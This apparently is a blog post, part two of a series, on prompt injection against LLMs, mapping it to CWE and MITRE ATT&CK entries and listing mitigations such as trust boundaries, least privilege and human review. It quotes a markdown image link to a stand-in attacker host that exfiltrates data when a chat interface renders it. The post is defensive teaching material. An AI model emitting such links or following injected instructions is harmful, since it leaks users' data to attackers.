Prompt Injection: A Deeper Dive and Mitigation- Part 2

LLM Monster 01

Before we launch into mitigations, I have found an additional resource we can use in our analysis, Bob Simonoff's LLM Commentary. Bob is a Senior Prinicpal Software Engineer and Fellow in his current position. Additionally, he is a core team member and founder of the OWASP Top 10 for LLMs. Bob provides content and commentary on the Top 10 for LLMs.

Additional Mapping - Common Weakness Enumeration (CWE) and MITRE ATT&CK®.

Bob does an impressive job of mapping these vulnerabilities to CWE, ATT&CK, and ATLAS! We wont go over every single additional mapping with as much detail as previously. You can get additional details off his GitHub Repository linked above.

LLM Monster 05

CWE

  1. CWE-20: Improper Input Validation
  2. CWE-77: Improper Neutralization of Special Elements Used in a Command ('Command Injection')
  3. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  4. CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  5. CWE-114: Process Control
  6. CWE-285: Improper Authorization
  7. CWE-287: Improper Authentication
  8. CWE-346: Origin Validation Error

If we remember in the previous discussion, prompt injection occurs when we are able to directly convince the model to go against its set of rules or indirectly by a plugin, that is going to do something run a command, complete a task, which might not be in the user or model owners best interest. One example we discussed last time was how ChatGPT renders markdown:

![data exfiltration in progress](https://attacker/q=*exfil_data*) 

If you remember this example, the blank image would be rendered, and the attacker now has control of the LLM, this is due to improper handling / sanitization of the data.

MITRE ATT&CK®

  1. T1059: Command and Scripting Interpreter
  2. T1078: Valid Accounts
  3. T1090: Proxy
  4. T1190: Exploit Public-Facing Application
  5. T1548: Abuse Elevation Control Mechanism
  6. T1550: Use Alternate Authentication Material
  7. T1566: Phishing

An attacker is going to use many different mechanisms to gain access to the system and LLM. We discussed many asspects of these in the last post, in relation to ML Model Access, as well as Command and Scripting Interpreter. An attacker is going to attempt to gain access to the LLM by any means possible, be it via prompt injection or by traditional means, such as stealing valid accounts via phishing campaigns, account enumeration, or account escalation. Also data scientists in the space usually have more access than they should. These are just a few things to be mindful of.

These vulnerabilities are possible due to the fact that LLMs use natural language. LLMs view both direct and indirect instructions as user-provided input. As per the norm in security, there is no fool-proof mechanism to prevent this. Therefore, it is important to implement mitigations to minimize the impact when a prompt injection is carried out, in addition to any remediations you might take to prevent particular or "known" exploitations.

LLM Monster 02

Prevention

So as we mentioned, LLMs are naturally vulnerable to these forms of attacks due to their nature. So, it is important to prevent prompt injections, as well as add additional mitigations to limit the impact prompt injection exploits could carry out.

  1. Separate external content (plug-ins) from user input.
  1. Establish trust boudaries between the LLM, external sources, and downstream functionality. Or implement application isolation/sandboxing.
  1. Enforce privilege control, following the principle of least privilege.
  1. Extensible functionality should always implement human in the loop.
  1. Advesarial Input Detection / Query Auditing
  1. Restrict Library Loading
LLM Monster 02

Closing Thoughts

Current approaches to reduce direct prompt injection seems to follow a more "Whack-a-mole" style approach, thus it is important to invest more energy into exploring prevention and mitigation of this vulnerability. Many of the remaining OWASP Top 10 for LLM are possible in part by prompt injection.

Also, all images in this post, unless otherwise noted, were created with Stable Diffusion with the prompt "AI Hacker Prompt Injection" by use here at Outlaw Research Labs!

© Your Name.RSS